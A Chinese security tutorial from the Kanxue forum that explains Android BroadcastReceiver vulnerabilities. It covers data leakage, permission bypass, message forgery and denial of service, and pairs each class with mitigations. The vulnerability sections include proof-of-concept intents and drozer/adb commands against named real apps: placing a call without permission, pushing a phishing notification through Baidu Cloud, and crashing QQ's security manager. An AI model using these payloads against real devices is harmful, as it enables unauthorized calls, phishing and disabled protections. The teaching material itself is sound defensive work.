Android APP漏洞之战——Broadcast Recevier漏洞详解
本文为看雪论坛优秀文章
看雪论坛作者ID:随风而行aa
Android APP漏洞之战(2)——Service漏洞挖掘详解
Android APP漏洞之战(1)——Activity漏洞挖掘详解。
1
Broadcast Recevier初步介绍
1、Broadcast Recevier的基本原理
(1)广播机制简介
Android中的每个应用程序都可以对自己感兴趣的广播进行注册,这样该程序只会收到自己所关心的广播内容,这些广播可以是来自系统的,也可能是来自其他程序的。Android提供了一套完整的API,允许应用程序自由地发送和接收广播。
(2)广播机制应用场景
①Android内不同组件间的通信(应用/不同应用之间)
②多线程通信
③与Android系统在特定情况下的通信
(3)广播机制模型理解
Android的广播机制使用了设计模式中的观察者模式:基于消息的发布/订阅事件模型,从设计模式上讲,广播的发送者和接收者极大程度的**解耦**,使得系统方便集成,容易扩展。
①消息订阅者(广播接收者)
②消息发布者(广播发布者)
③消息中心(AMS,即Activity Manager Service)
(4)广播机制的使用流程
①首先开发人员自定义广播接收者BroadcastReceiver,并重写onRecvice()方法,在里面可以实现具体操作,然后到消息中心AMS注册
②广播发送者定义并向AMS发送广播
③AMS查找符合相应条件(IntentFilter/Permission等)的BroadcastReceiver
④AMS将广播发送到上述符合条件的BroadcastReceiver相应的消息循环队列中
⑤BroadcastReceiver通过消息循环执行拿到此广播,回调BroadcastReceiver中的onReceive()方法。
// 继承BroadcastReceivre类public class mBroadcastReceiver extends BroadcastReceiver {
// 复写onReceive()方法 // 接收到广播后,则自动调用该方法 @Override public void onReceive(Context context, Intent intent) { //写入接收广播后的操作 }}操作步骤:(1)继承BroadcastReceivre基类(2)必须复写抽象方法onReceive()方法 广播接收器接收到相应广播后,会自动回调 onReceive() 方法,一般情况下,onReceive方法会涉及 与 其他组件之间的交互,如发送Notification、启动Service等,默认情况下,广播接收器运行在 UI 线程,因此,onReceive()方法不能执行耗时操作,否则将导致ANR在AndroidManifest.xml里通过<receive>标签声明。
<receiver android:enabled=["true" | "false"]//此broadcastReceiver能否接收其他App的发出的广播//默认值是由receiver中有无intent-filter决定的:如果有intent-filter,默认值为true,否则为false android:exported=["true" | "false"] android:icon="drawable resource" android:label="string resource"//继承BroadcastReceiver子类的类名 android:name=".mBroadcastReceiver"//具有相应权限的广播发送者发送的广播才能被此BroadcastReceiver所接收; android:permission="string"//BroadcastReceiver运行所处的进程//默认为app的进程,可以指定独立的进程//注:Android四大基本组件都可以通过此属性指定自己的独立进程 android:process="string" >
//用于指定此广播接收器将接收的广播类型//本示例中给出的是用于接收网络状态改变时发出的广播 <intent-filter><action android:name="android.net.conn.CONNECTIVITY_CHANGE" /> </intent-filter></receiver><receiver //此广播接收者类是mBroadcastReceiver android:name=".mBroadcastReceiver" > //用于接收网络状态改变时发出的广播 <intent-filter> <action android:name="android.net.conn.CONNECTIVITY_CHANGE" /> </intent-filter></receiver>动态注册需要在功能代码中进行注册。
①实例化自定义的广播接收者,我们实现广播的功能,可以继承BroadcastReceiver类,并重写类中的方法。
②实例化意图过滤器,并设置要过滤的广播类型。
③使用Context的registerReceiver(BroadcastReceiver,IntentFilter)方法注册广播。
④在onDestory()方法中通过调用unregisterReceiver()方法来实现取消注册。
①对于动态广播,有注册就必然得有注销,否则会导致内存泄露
②Activity生命周期如下都是成对出现的 onCreate() & onDestory()、onStart() & onStop()、onResume() & onPause()
①广播 是 用意图(Intent)标识
②定义广播的本质 = 定义广播所具备的“意图(Intent)
③广播发送 = 广播发送者 将此广播的“意图(Intent)”通过sendBroadcast()方法发送出去
①普通广播
②系统广播
③有序广播
④粘性广播
⑤App应用内广播
Intent intent = new Intent();//对应BroadcastReceiver中intentFilter的actionintent.setAction("BROADCAST_ACTION");//发送广播sendBroadcast(intent);<receiver //此广播接收者类是mBroadcastReceiver android:name=".mBroadcastReceiver" > //用于接收网络状态改变时发出的广播 <intent-filter> <action android:name="BROADCAST_ACTION" /> </intent-filter></receiver>系统操作 action监听网络变化 android.net.conn.CONNECTIVITY_CHANGE关闭或打开飞行模式 Intent.ACTION_AIRPLANE_MODE_CHANGED充电时或电量发生变化 Intent.ACTION_BATTERY_CHANGED电池电量低 Intent.ACTION_BATTERY_LOW电池电量充足(即从电量低变化到饱满时会发出广播 Intent.ACTION_BATTERY_OKAY系统启动完成后(仅广播一次) Intent.ACTION_BOOT_COMPLETED按下照相时的拍照按键(硬件按键)时 Intent.ACTION_CAMERA_BUTTON屏幕锁屏 Intent.ACTION_CLOSE_SYSTEM_DIALOGS设备当前设置被改变时(界面语言、设备方向等) Intent.ACTION_CONFIGURATION_CHANGED插入耳机时 Intent.ACTION_HEADSET_PLUG未正确移除SD卡但已取出来时(正确移除方法:设置--SD卡和设备内存--卸载SD卡) Intent.ACTION_MEDIA_BAD_REMOVAL插入外部储存装置(如SD卡) Intent.ACTION_MEDIA_CHECKING成功安装APK Intent.ACTION_PACKAGE_ADDED成功删除APK Intent.ACTION_PACKAGE_REMOVED重启设备 Intent.ACTION_REBOOT屏幕被关闭 Intent.ACTION_SCREEN_OFF屏幕被打开 Intent.ACTION_SCREEN_ON关闭系统时 Intent.ACTION_SHUTDOWN重启设备 Intent.ACTION_REBOOT注:当使用系统广播是,只需要在注册广播接收者时定义相关的action即可,并不需要手动发送广播,当系统有相关操作时会自动进行系统广播①按照Priority属性值从大-小排序
②Priority属性相同者,动态注册的广播优先
①接收广播按顺序接收
②先接收的广播接收者可以对广播进行截断,即后接收的广播接收者不在接收此广播,可以使用abortBroadcast()方法
③先接收的广播接收者可以对广播进行修改,那么后接收的广播接收者将接收到被修改后的广播
sendOrderedBroadcast(intent,null); //参数1:接收的Intent 参数2:与权限相关字符串,一般为null①其他App针对性发出与当前App intent-filter相匹配的广播,由此导致当前App不断接收广播并处理。
②其他App注册与当前App一致的intent-filter用于接收广播,获取广播的具体星系,会出现安全性和效率性问题。
①App应用内广播壳理解为一种局部广播,广播的发送者和接收者都同属于一个App。
②相比于全局广播(普通广播),App应用内广播优势体现在:安全性高和效率高。
将全局广播设置为局部广播
①注册广播是将exported属性设置为false,使得非本App内部发出的此广播不被接收。
②在广播的发送和接收时,增设相应权限permission,用于权限验证。
③发送广播时指定该广播接收器所在的包名,此广播将只会发送到此包中的App内与之相匹配的有效广播接收器中。
使用封装好的LocalBroadcastManager类使用方式上与全局广播几乎相同,只是注册/取消注册广播接收器和发送广播时将参数context变成LocalBroadcastManager的单一实例。
//注册应用内广播接收器//步骤1:实例化BroadcastReceiver子类 & IntentFilter mBroadcastReceivermBroadcastReceiver = new mBroadcastReceiver();IntentFilter intentFilter = new IntentFilter();
//步骤2:实例化LocalBroadcastManager的实例localBroadcastManager = LocalBroadcastManager.getInstance(this);
//步骤3:设置接收广播的类型intentFilter.addAction(android.net.conn.CONNECTIVITY_CHANGE);
//步骤4:调用LocalBroadcastManager单一实例的registerReceiver()方法进行动态注册localBroadcastManager.registerReceiver(mBroadcastReceiver, intentFilter);
//取消注册应用内广播接收器localBroadcastManager.unregisterReceiver(mBroadcastReceiver);
//发送应用内广播Intent intent = new Intent();intent.setAction(BROADCAST_ACTION);localBroadcastManager.sendBroadcast(intent);对于静态注册(全局+应用内广播),回调onReceive(context,intent)中的context返回值是:ReceiverRestrictedContext对于全局广播的动态注册,回调onReceive(context, intent)中的context返回值是:Activity Context;对于应用内广播的动态注册(LocalBroadcastManager方式),回调onReceive(context, intent)中的context返回值是:Application Context对于应用内广播的动态注册(非LocalBroadcastManager方式),回调onReceive(context, intent)中的context返回值是:Activity Context2、Broadcast Reciver漏洞的种类和危害
2
Broadcast Reciver漏洞原理分析和复习
1、敏感信息泄漏漏洞
(1)原理介绍
发送的intent没有明确指定接收者,而是简单的通过action进行匹配,恶意应用便可以注册一个广播接收者嗅探拦截到这个广播,如果这个广播存在敏感数据,就被恶意应用窃取了。
(2)漏洞复现
private void d() { Intent v1 = new Intent(); v1.setAction("com.sample.action.server_running"); v1.putExtra("local_ip",v0.h); v1.putExtra("port",v0.i); v1.putExtra("code",v0.g); v1.putExtra("connected",v0.s); v1.putExtra("pwd_predefined",v0.r); if(!TextUtils.isEmpty(v0.t)){ v1.putExtra("connected_usr",v0.t); } sendBroadcast(v1);}public void onReceive(Context context,Intent intent){ String s = null; if(intent.getAction().equals("com.sample.action.server_running")){ String pwd=intent.getStringExtra("connected"); s="Airdroid => ["+pwd+"]/"+intent.getExtras(); } Toast.makeTest(context,String.format("%sReceived",s),Toast.LENGTH_SHORT).show();}Intent intent = new Intent("my-sensitive-event");intent.putExtra("event","this is a test event");LocalBroadcastManager.getInstance(this).sendBroadcast(intent);①RSSI值是通过广播获取的,绕过的正常的权限检查(ACCESS_WIFI_STATE)。
②通过广播或WiFimanager获取的RSSI值可以在不需要其他位置权限的情况下进行室内定制。
public class MainActivity extends Activity {@Overridepublic void onCreate(Bundle state) { IntentFilter filter = new IntentFilter(); filter.addAction(android.net.wifi.STATE_CHANGE); filter.addAction(android.net.wifi.RSSI_CHANGED); registerReceiver(receiver, filter);}
BroadcastReceiver receiver = new BroadcastReceiver() {@Overridepublic void onReceive(Context context, Intent intent) { Log.d(intent.toString()); ….}};①安装Broadcast Monitor app;
②将手机设置为飞行模式;
③进入房间;
④关掉飞行模式,以触发RSSI广播;
⑤从以下广播中获取RSSI值:
⑥重复步骤3-4。
2、权限绕过漏洞
(1)原理介绍
可以通过两种方式注册广播接收器,一种是在AndroidManifest.xml文件中通过<receiver>标签静态注册,另一种是通过Context.registerReceiver()动态注册,指定相应的intentFilter参数,动态注册的广播默认都是导出的,如果导出的BroadcastReceiver没有做权限控制,导致BroadcastReceiver组件可以接收一个外部可控的url、或者其他命令,导致攻击者可以越权利用应用的一些特定功能,比如发送恶意广播、伪造消息、任意应用下载安装、打开钓鱼网站等。
(2)漏洞复现
MIUI内置的手电筒软件Stk.apk中,TorchService服务没有对广播来源进行验证,导致任何程序可以调用这个服务,打开或关闭手电筒,利用这个漏洞,可以导致系统电源迅速消耗。
Intent intent = new Intent();intent.setAction("net.cactii.flash2.TOGGLE_FLASHLIGHT");sendBroadcast(intent);①在AndroidManifest.xml中,将TorchService申明为export="false"的;
② 在AndroidManifest.xml中,申明一个私有权限,级别为signature,并为TorchService申明需要这个权限;
③ 在TorchService的实现代码中,检查Intent的来源是否Stk.apk自身。
酷派最安全手机s6拨打电话权限绕过,第三方app可以无需拨打电话权限直接拨打电话。
Intent intent = new Intent();intent.setComponent(new ComponentName("com.android.phone","com.android.phone.PhoneGlobals$NotificationBroadcastReceiver"));intent.setAction("com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION");intent.setData(Uri.parse("tel:10000"));intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);sendBroadcast(intent);①使用本地广播
②对广播的action进行判别
程序加锁解锁是靠广播来控制的,并且这两条广播没做权限限制,任意应用可以发送此广播达到恶意解锁、恶意锁定应用的目的。
adb shell am broadcast -a android.intent.action.PACKAGE_FULLY_REMOVED -d package:com.wumii.android.mimi推荐使用呢LocalBroadcastManager类,这个类相较于Context.sendBroadcast(intent)有下面三方面的优势:
①不用担心敏感数据泄露,通过这种方式发送的广播只能应用内接收。
②不用担心安全漏洞被利用,因为其他应用无法发送恶意广播给你。
③它比系统的全局广播更高效。
3、消息伪造
(1)漏洞介绍
暴露的Receiver对外接收Intent,如果构造恶意的消息放在Intent中传输,被调用的Receiver接收可能产生安全隐患。
(2)漏洞复现
百度云盘手机版存在高危漏洞,恶意攻击者通过该漏洞可以对手机用户进行钓鱼欺骗,盗取用户隐私文件和信息,以百度云盘APP权限执行任何代码。百度云盘有一个广播接收器没有对消息进行安全验证,通过发送恶意的消息,攻击者可以在用户手机通知栏上推送任意消息,点击消息后可以利用webview组件盗取本地隐私文件和执行任意代码。
存在漏洞的组件是:com.baidu.android.pushservice.action.MESSAGE
Intent i = new Intent(); i.setAction("com.baidu.android.pushservice.action.MESSAGE"); Bundle b = new Bundle(); try { JSONObject jsobject = new JSONObject();//1. phishing JSONObject custom_content_js = new JSONObject(); jsobject.put("title", "百度云盘【漏洞你中奖了!】"); jsobject.put("description", ""); //jsobject.put("url", "http://bcscdn.baidu.com/netdisk/BaiduYun_5.1.0.apk"); jsobject.put("url", "http://drops.wooyun.org/webview.html"); JSONObject customcontent_js = new JSONObject(); customcontent_js.put("type", "1"); customcontent_js.put("msg_type", "resources_push"); customcontent_js.put("uk", "1"); customcontent_js.put("shareId", "1"); jsobject.put("custom_content", customcontent_js); String cmd = jsobject.toString(); b.putByteArray("message", cmd.getBytes("UTF-8")); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); }设置为签名验证android:protectionLevel="signature"<receiver android:name="com.umeng.message.UmengMessageBootReceiver" android:protectionLevel="signature"> <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED"/> </intent-filter></receiver>4、拒绝服务
(1)漏洞介绍
如果敏感的BroadcastReceiver没有设置相应的权限保护,很容易受到攻击。最常见的是拒绝服务攻击。拒绝服务攻击指的是,传递恶意畸形的intent数据给广播接收器,广播接收器无法处理异常导致crash。
拒绝服务攻击的危害视具体业务场景而定,比如一个安全防护产品的拒绝服务、锁屏应用的拒绝服务、支付进程的拒绝服务等危害就是巨大的。
(2)漏洞复现
恶意软件发送一个消息就可以轻松让QQ手机管家拒绝服务,安全防护完全失灵。
com.tencent.qqpimsecure.service.InOutCallReceiver这个广播组件没有对消息进行校验,导致空消息造成null point问题,直接crash。
Intent i = new Intent();ComponentName componetName = new ComponentName( "com.tencent.qqpimsecure", "com.tencent.qqpimsecure.service.InOutCallReceiver"); i.setComponent(componetName); sendBroadcast(i);run app.broadcast.info -a org.owasp.goatdroid.fourgoatsrun app.broadcast.send --action 广播名 --extra string name lisirun app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message dogrun app.broadcast.send --action <action>空指针异常类型转换异常数组越界访问异常类未定义异常其他异常
//Serializable:Intent i = this.getIntent();if(i.getAction().equals(“serializable_action”)){
i.getSerializableExtra("serializable_key");//未做异常判断}//Parcelable:this.b=(RouterConfig)this.getIntent().getParcelableExtra(“filed_router_config”);//引发转型异常崩溃
谨慎处理接收的intent以及其携带的信息。对接收到的任何数据做try catch处理,以及对不符合预期的数据做异常处理。3
Broadcast Reciver的安全防护
①私有广播接收器设置exported=’false’,并且不配置intent-filter。(私有广播接收器依然能接收到同UID的广播)。
②对接收来的广播进行验证。
③内部app之间的广播使用protectionLevel=’signature’ 验证其是否真是内部app。
④返回结果时需注意接收app是否会泄露信息。
⑤发送的广播包含敏感信息时需指定广播接收器,使用显示意图或者setPackage(String packageName)。
⑥使用LocalBroadcastManager。
4
实验总结
参考:
《Android第一行代码》
https://www.jianshu.com/p/ca3d87a4cdf3
https://blog.csdn.net/q376794191/article/details/85292952
https://www.cnblogs.com/lwbqqyumidi/p/4168017.html
https://www.jianshu.com/p/c1a826a5beea
https://www.jianshu.com/p/e236a2669797
https://www.jianshu.com/p/e236a2669797
https://wwws.nightwatchcybersecurity.com/2018/11/11/cve-2018-9581/
https://tea9.xyz/post/962818054.html
https://paper.seebug.org/papers/Archive/drops2/Android%20Broadcast%20Security.html
看雪ID:随风而行aa
https://bbs.pediy.com/user-home-905443.htm
官网:https://www.bagevent.com/event/6334937
# 往期推荐
1.DASCTF八月挑战赛 Android 逆向 apkrev
2. 进程和线程
3.All About Crypto - CTF竞赛密码学方向指南
6. CVE-2012-3569 VMware OVF Tool格式化字符串漏洞分析
球分享
球点赞
球在看
点击“阅读原文”,了解更多!